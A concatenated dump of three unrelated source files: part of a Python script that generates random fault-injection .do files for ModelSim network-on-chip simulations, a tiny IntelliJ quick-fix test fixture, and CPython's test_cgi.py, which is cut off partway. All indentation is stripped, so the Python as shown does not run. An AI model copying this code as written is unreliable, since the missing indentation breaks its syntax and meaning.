list_of_widths = []
# Every router has the Local port
for i in range(0, network_size*network_size):
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:FIFO_MEM_1")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:FIFO_MEM_2")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:FIFO_MEM_3")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:FIFO_MEM_4")
# Internal signals of FIFO
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:read_pointer")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:read_pointer_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:write_pointer")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:write_pointer_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:credit_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:empty")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:full")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:read_en")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:write_en")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:fake_credit")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:fake_credit_counter")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:fake_credit_counter_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:state_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:state_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:fault_info_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:fault_info_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:faulty_packet_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:faulty_packet_in")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:flit_type") -- flit_type is an alias
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:write_fake_flit")
list_of_widths += [4, 4, 4, 4, 1, 1, 1, 1, 1, 1, 2, 2, 5, 5, 1, 1, 1, 1, 1]
# for i in range(0, network_size*2):
if i/network_size != 0: # has port N
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:FIFO_MEM_1")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:FIFO_MEM_2")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:FIFO_MEM_3")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:FIFO_MEM_4")
# Internal signals of FIFO
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:read_pointer")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:read_pointer_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:write_pointer")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:write_pointer_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:credit_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:empty")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:full")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:read_en")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:write_en")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:fake_credit")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:fake_credit_counter")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:fake_credit_counter_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:state_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:state_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:fault_info_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:fault_info_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:faulty_packet_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:faulty_packet_in")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:flit_type") -- flit_type is an alias
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:write_fake_flit")
list_of_widths += [4, 4, 4, 4, 1, 1, 1, 1, 1, 1, 2, 2, 5, 5, 1, 1, 1, 1, 1]
if i/network_size != network_size-1: # has port S
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:FIFO_MEM_1")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:FIFO_MEM_2")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:FIFO_MEM_3")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:FIFO_MEM_4")
# Internal signals of FIFO
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:read_pointer")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:read_pointer_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:write_pointer")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:write_pointer_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:credit_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:empty")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:full")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:read_en")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:write_en")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:fake_credit")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:fake_credit_counter")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:fake_credit_counter_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:state_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:state_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:fault_info_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:fault_info_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:faulty_packet_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:faulty_packet_in")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:flit_type") -- flit_type is an alias
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:write_fake_flit")
list_of_widths += [4, 4, 4, 4, 1, 1, 1, 1, 1, 1, 2, 2, 5, 5, 1, 1, 1, 1, 1]
if i%network_size != 0: # has port W
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:FIFO_MEM_1")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:FIFO_MEM_2")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:FIFO_MEM_3")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:FIFO_MEM_4")
# Internal signals of FIFO
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:read_pointer")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:read_pointer_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:write_pointer")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:write_pointer_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:credit_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:empty")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:full")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:read_en")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:write_en")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:fake_credit")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:fake_credit_counter")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:fake_credit_counter_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:state_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:state_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:fault_info_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:fault_info_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:faulty_packet_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:faulty_packet_in")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:flit_type") -- flit_type is an alias
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:write_fake_flit")
list_of_widths += [4, 4, 4, 4, 1, 1, 1, 1, 1, 1, 2, 2, 5, 5, 1, 1, 1, 1, 1]
if i%network_size != network_size-1: # has port E
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:FIFO_MEM_1")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:FIFO_MEM_2")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:FIFO_MEM_3")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:FIFO_MEM_4")
# Internal signals of FIFO
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:read_pointer")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:read_pointer_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:write_pointer")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:write_pointer_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:credit_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:empty")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:full")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:read_en")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:write_en")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:fake_credit")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:fake_credit_counter")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:fake_credit_counter_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:state_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:state_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:fault_info_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:fault_info_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:faulty_packet_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:faulty_packet_in")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:flit_type") -- flit_type is an alias
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:write_fake_flit")
list_of_widths += [4, 4, 4, 4, 1, 1, 1, 1, 1, 1, 2, 2, 5, 5, 1, 1, 1, 1, 1]
return list_of_ports, list_of_widths
def generate_links_dictionary(network_size, sim_time):
"""
This function generates random faults on all RX signals of the network
"""
list_of_ports = []
list_of_widths = []
ports, widths = list_all_the_links(network_size)
list_of_ports += ports
list_of_widths += widths
# ports, widths = list_all_the_lbdr_signals(network_size)
# list_of_ports += ports
# list_of_widths += widths
# ports, widths = list_all_the_fifo_signals(network_size)
# list_of_ports += ports
# list_of_widths += widths
# ports, widths = list_all_the_arbiter_signals(network_size)
# list_of_ports += ports
# list_of_widths += widths
random.seed(FAULT_RANDOM_SEED)
fault_list = []
for item in list_of_ports:
item_index = list_of_ports.index(item)
width = list_of_widths[item_index]
# fault_type = random.choice(["T", "P", "I", "T->P", "T->I"])
fault_type = random.choice(["T"])
shut_down_time = None
std_dev = None
if fault_type == "T": # Transient fault
frequency = random.choice(["H", "M", "L"])
if frequency == "H":
mean_time = int((1000000000/Fault_Per_Second)/HIGH_FAULT_RATE)
elif frequency == "M":
mean_time = int((1000000000/Fault_Per_Second)/LOW_FAULT_RATE)
else:
mean_time = int((1000000000/Fault_Per_Second)/MEDIUM_FAULT_RATE)
std_dev = int(mean_time*0.1+1)
elif fault_type == "I" or fault_type == "T->I": # Intermittent fault or transient to intermittent
mean_time = int(MTB_INTERMITTENT_BURST)
std_dev = int(mean_time*0.1+1)
elif fault_type == "P": # its Permentent fault
mean_time = None
std_dev = None
shut_down_time = random.randint(int(sim_time*0.1), int(sim_time*0.9))
elif fault_type == "T->P": # Transient goes to Intermittent and then to Permanent
mean_time = int(1000000000/Fault_Per_Second)
shut_down_time = random.randint(int(sim_time*0.1), int(sim_time*0.9))
std_dev = int(mean_time*0.1+1)
new_fault = fault(item, width, fault_type, mean_time, std_dev, shut_down_time)
fault_list.append(new_fault)
report_faults(fault_list)
return fault_list
def parse_fault_info_file(file_path):
"""
If you want to feed the fault info from a file...
the file lines should be organized like this:
fault_location: signal_width fault_type MTBF std_deviation shutdown_time
fault_location: the signal bit that you want to inject the fault on.
signal_width: The width of the signal that you intend to inject the bit-flip in
fault_type: should be chosen from the follwoing list:
* T : Transient
* I : Intermittent
* P : Permanent
* T->P : Transient to Intermittent to permanent
* T->I : Transient to Intermittent
MTBF: Mean time between the faults
std_deviation: Standard deviation used for generating faults
shutdown_time: Time in ns when the signal would be permanently faulty only used when
you need permanent fault. otherwise "None".
Example:
tb_network_2x2:NoC:R_0:RX_L(21) 32 I 1000 101 None
"""
fault_list = []
fault_info_file = open(file_path, 'r')
line = fault_info_file.readline()
while line != "":
split_line = line.split()
fault_location = split_line[0]
signal_width = int(split_line[1])
fault_type = split_line[2]
fault_MTBF = split_line[3]
fault_STD = split_line[4]
shut_down_time = split_line[5]
new_fault = fault(fault_location, signal_width, fault_type, fault_MTBF, fault_STD, shut_down_time)
fault_list.append(new_fault)
line = fault_info_file.readline()
return fault_list
#----------------------------------------------------------------------------------------------
#
# Generating the actual do file.
#
#----------------------------------------------------------------------------------------------
def generate_fault_injection_do(file_path, sim_time, sim_end, fault_list):
"""
Generates a do file for modelsim for injecting the faults
fault_path: string : path to the fault_inject.do
sim_time: integer : How long do you want to inject faults in the simulation ns
sim_end: integer : end of simulation
fault_list: list : list of fault objects for injection
the generated faults would look like these:
*T: ___|____________|____________|____________|____________|____________|____________|____________|
Transient faults happen periodically with a normal distribution with mean time between faults and a
standard deviation
*I: ____________________________||||||||||______________________________________||||||||||_________
Intermittent faults happen in bursts periodically with a normal distribution with mean time between
faults and a standard deviation. each burst injects 10 stuck at faults.
*P: __________________________________________________|''''''''''''''''''''''''''''''''''''''''''''
Permanent faults happen right after the specified shutdown time.
*T->I: ___|____________|____________|____________||||||||||____________________________||||||||||_____
first it behaves as Transient, then becomes intermittent. For transient MTBF and Std_Dev it uses the
specified values in the fault object. for intermittent faults it uses the values specified in package
file.
*T->P: ___|____________|____________|____________||||||||||______________________|''''''''''''''''''''
First it behaves as transient, then turns into intermittent and then permanent. For transient MTBF and
Std_Dev it uses the specified values in the fault object. for intermittent faults it uses the values
specified in package file. for becomming permanent, it uses the shutdown time specified in the fault
object.
"""
list_of_links = fault_list
delay = 1000000000/Fault_Per_Second
deviation = int(delay/10)
if deviation == 0:
deviation = 1
fault_inject_file = open(file_path+'/fault_inject.do', 'w')
permanently_faulty_locations = []
temp_dict = {}
for item in list_of_links:
if item.Type == "T":
fault_time = 0
time_until_next_fault = numpy.random.normal(item.mean_time, item.std_dev)
fault_time += time_until_next_fault
while fault_time < sim_time:
if int(fault_time) in temp_dict.keys():
temp_dict[int(fault_time)].append(item)
else:
temp_dict[int(fault_time)] = [item]
time_until_next_fault = numpy.random.normal(item.mean_time, item.std_dev)
fault_time += time_until_next_fault
if item.Type == "I":
fault_time = 0
time_until_next_fault = numpy.random.normal(item.mean_time, item.std_dev)
fault_time += time_until_next_fault
while fault_time < sim_time:
for event in range(0, EVENTS_PER_BURST):
if int(fault_time+event) in temp_dict.keys():
temp_dict[int(fault_time+event)].append(item)
else:
temp_dict[int(fault_time+event)] = [item]
time_until_next_fault = numpy.random.normal(item.mean_time, item.std_dev)
fault_time += time_until_next_fault
if item.Type == "T->I":
permanently_faulty_locations.append(item)
fault_time = 0
time_until_next_fault = numpy.random.normal(item.mean_time, item.std_dev)
fault_time += time_until_next_fault
while fault_time < int(sim_time*0.5):
if int(fault_time) in temp_dict.keys():
temp_dict[int(fault_time)].append(item)
else:
temp_dict[int(fault_time)] = [item]
time_until_next_fault = numpy.random.normal(item.mean_time, item.std_dev)
fault_time += time_until_next_fault
time_until_next_fault = numpy.random.normal(int(MTB_INTERMITTENT_BURST), \
int(MTB_INTERMITTENT_BURST*0.1+1))
fault_time += time_until_next_fault
while fault_time+EVENTS_PER_BURST < int(sim_time):
for event in range(0, EVENTS_PER_BURST):
if int(fault_time+event) in temp_dict.keys():
temp_dict[int(fault_time+event)].append(item)
else:
temp_dict[int(fault_time+event)] = [item]
time_until_next_fault = numpy.random.normal(int(MTB_INTERMITTENT_BURST), \
int(MTB_INTERMITTENT_BURST*0.1+1))
fault_time += time_until_next_fault
if item.Type == "P":
permanently_faulty_locations.append(item)
if item.Type == "T->P":
permanently_faulty_locations.append(item)
fault_time = 0
time_until_next_fault = numpy.random.normal(item.mean_time, item.std_dev)
fault_time += time_until_next_fault
while fault_time < int(item.shut_down_time*0.5):
if int(fault_time) in temp_dict.keys():
temp_dict[int(fault_time)].append(item)
else:
temp_dict[int(fault_time)] = [item]
time_until_next_fault = numpy.random.normal(item.mean_time, item.std_dev)
fault_time += time_until_next_fault
time_until_next_fault = numpy.random.normal(int(MTB_INTERMITTENT_BURST), \
int(MTB_INTERMITTENT_BURST*0.1+1))
fault_time += time_until_next_fault
while fault_time+EVENTS_PER_BURST < int(item.shut_down_time):
for event in range(0, EVENTS_PER_BURST):
if int(fault_time+event) in temp_dict.keys():
temp_dict[int(fault_time+event)].append(item)
else:
temp_dict[int(fault_time+event)] = [item]
time_until_next_fault = numpy.random.normal(int(MTB_INTERMITTENT_BURST), \
int(MTB_INTERMITTENT_BURST*0.1+1))
fault_time += time_until_next_fault
fault_inject_file.write("#################################\n")
current_time = 0
for i in range(0, sim_time):
for permanent_fault_location in permanently_faulty_locations:
if i == permanent_fault_location.shut_down_time:
location = permanent_fault_location.location
fault_inject_file.write("# ###################################################\n")
fault_inject_file.write("# Shutting down signal: "+location+" for good!\n")
fault_inject_file.write("force -drive sim/:"+location+" U 1ns\n")
fault_inject_file.write("# ###################################################\n")
if i in temp_dict.keys():
last_time = current_time
current_time = i
fault_inject_file.write("run "+str(current_time-last_time)+"ns\n")
for item in temp_dict[i]:
location = item.location
if item.Type == "I" or item.Type == "T->I" or item.Type == "T->P":
string = "force -drive sim/:"+location+" " + str(random.choice(["0", "1"]))
string += " 0 ns -cancel 1ns"
else:
string = "force -drive sim/:"+location+" " + str(random.choice(["0", "1"]))
random_start = random.randint(0, deviation)
string += " "+str(random_start)+"ns -cancel "+str(random_start+1)+"ns"
fault_inject_file.write(string+"\n")
fault_inject_file.write("run "+str(sim_end-sim_time)+"ns\n")
fault_inject_file.write("stop")
fault_inject_file.close()
|
kdwink/intellij-community | refs/heads/master | python/testData/quickFixes/PyMakeFunctionFromMethodQuickFixTest/usageSelf.py | 75 | class A():
def method(self):
self.method2()
def metho<caret>d2(self):
print 1 |
kanagasabapathi/python-for-android | refs/heads/master | python3-alpha/python3-src/Lib/test/test_cgi.py | 46 | from test.support import run_unittest, check_warnings
import cgi
import os
import sys
import tempfile
import unittest
from io import StringIO, BytesIO
class HackedSysModule:
# The regression test will have real values in sys.argv, which
# will completely confuse the test of the cgi module
argv = []
stdin = sys.stdin
cgi.sys = HackedSysModule()
class ComparableException:
def __init__(self, err):
self.err = err
def __str__(self):
return str(self.err)
def __eq__(self, anExc):
if not isinstance(anExc, Exception):
return NotImplemented
return (self.err.__class__ == anExc.__class__ and
self.err.args == anExc.args)
def __getattr__(self, attr):
return getattr(self.err, attr)
def do_test(buf, method):
env = {}
if method == "GET":
fp = None
env['REQUEST_METHOD'] = 'GET'
env['QUERY_STRING'] = buf
elif method == "POST":
fp = BytesIO(buf.encode('latin-1')) # FieldStorage expects bytes
env['REQUEST_METHOD'] = 'POST'
env['CONTENT_TYPE'] = 'application/x-www-form-urlencoded'
env['CONTENT_LENGTH'] = str(len(buf))
else:
raise ValueError("unknown method: %s" % method)
try:
return cgi.parse(fp, env, strict_parsing=1)
except Exception as err:
return ComparableException(err)
parse_strict_test_cases = [
("", ValueError("bad query field: ''")),
("&", ValueError("bad query field: ''")),
("&&", ValueError("bad query field: ''")),
(";", ValueError("bad query field: ''")),
(";&;", ValueError("bad query field: ''")),
# Should the next few really be valid?
("=", {}),
("=&=", {}),
("=;=", {}),
# This rest seem to make sense
("=a", {'': ['a']}),
("&=a", ValueError("bad query field: ''")),
("=a&", ValueError("bad query field: ''")),
("=&a", ValueError("bad query field: 'a'")),
("b=a", {'b': ['a']}),
("b+=a", {'b ': ['a']}),
("a=b=a", {'a': ['b=a']}),
("a=+b=a", {'a': [' b=a']}),
("&b=a", ValueError("bad query field: ''")),
("b&=a", ValueError("bad query field: 'b'")),
("a=a+b&b=b+c", {'a': ['a b'], 'b': ['b c']}),
("a=a+b&a=b+a", {'a': ['a b', 'b a']}),
("x=1&y=2.0&z=2-3.%2b0", {'x': ['1'], 'y': ['2.0'], 'z': ['2-3.+0']}),
("x=1;y=2.0&z=2-3.%2b0", {'x': ['1'], 'y': ['2.0'], 'z': ['2-3.+0']}),
("x=1;y=2.0;z=2-3.%2b0", {'x': ['1'], 'y': ['2.0'], 'z': ['2-3.+0']}),
("Hbc5161168c542333633315dee1182227:key_store_seqid=400006&cuyer=r&view=bustomer&order_id=0bb2e248638833d48cb7fed300000f1b&expire=964546263&lobale=en-US&kid=130003.300038&ss=env",
{'Hbc5161168c542333633315dee1182227:key_store_seqid': ['400006'],
'cuyer': ['r'],
'expire': ['964546263'],
'kid': ['130003.300038'],
'lobale': ['en-US'],
'order_id': ['0bb2e248638833d48cb7fed300000f1b'],
'ss': ['env'],
'view': ['bustomer'],
}),
("group_id=5470&set=custom&_assigned_to=31392&_status=1&_category=100&SUBMIT=Browse",
{'SUBMIT': ['Browse'],
'_assigned_to': ['31392'],
'_category': ['100'],
'_status': ['1'],
'group_id': ['5470'],
'set': ['custom'],
})
]
def norm(seq):
return sorted(seq, key=repr)
def first_elts(list):
return [p[0] for p in list]
def first_second_elts(list):
return [(p[0], p[1][0]) for p in list]
def gen_result(data, environ):
encoding = 'latin-1'
fake_stdin = BytesIO(data.encode(encoding))
fake_stdin.seek(0)
form = cgi.FieldStorage(fp=fake_stdin, environ=environ, encoding=encoding)
result = {}
for k, v in dict(form).items():
result[k] = isinstance(v, list) and form.getlist(k) or v.value
return result
class CgiTests(unittest.TestCase):
def test_strict(self):
for orig, expect in parse_strict_test_cases:
# Test basic parsing
d = do_test(orig, "GET")
self.assertEqual(d, expect, "Error parsing %s method GET" % repr(orig))
d = do_test(orig, "POST")
self.assertEqual(d, expect, "Error parsing %s method POST" % repr(orig))
env = {'QUERY_STRING': orig}
fs = cgi.FieldStorage(environ=env)
if isinstance(expect, dict):
# test dict interface
self.assertEqual(len(expect), len(fs))
self.assertCountEqual(expect.keys(), fs.keys())
##self.assertEqual(norm(expect.values()), norm(fs.values()))
##self.assertEqual(norm(expect.items()), norm(fs.items()))
self.assertEqual(fs.getvalue("nonexistent field", "default"), "default")
# test individual fields
for key in expect.keys():
expect_val = expect[key]
self.assertIn(key, fs)
if len(expect_val) > 1:
self.assertEqual(fs.getvalue(key), expect_val)
else:
self.assertEqual(fs.getvalue(key), expect_val[0])
def test_log(self):
cgi.log("Testing")
cgi.logfp = StringIO()
cgi.initlog("%s", "Testing initlog 1")
cgi.log("%s", "Testing log 2")
self.assertEqual(cgi.logfp.getvalue(), "Testing initlog 1\nTesting log 2\n")
if os.path.exists("/dev/null"):
cgi.logfp = None
cgi.logfile = "/dev/null"
cgi.initlog("%s", "Testing log 3")
def log_cleanup():
"""Restore the global state of the log vars."""
cgi.logfile = ''
cgi.logfp.close()
cgi.logfp = None
cgi.log = cgi.initlog
self.addCleanup(log_cleanup)
cgi.log("Testing log 4")
def test_fieldstorage_readline(self):
# FieldStorage uses readline, which has the capacity to read all
# contents of the input file into memory; we use readline's size argument
# to prevent that for files that do not contain any newlines in
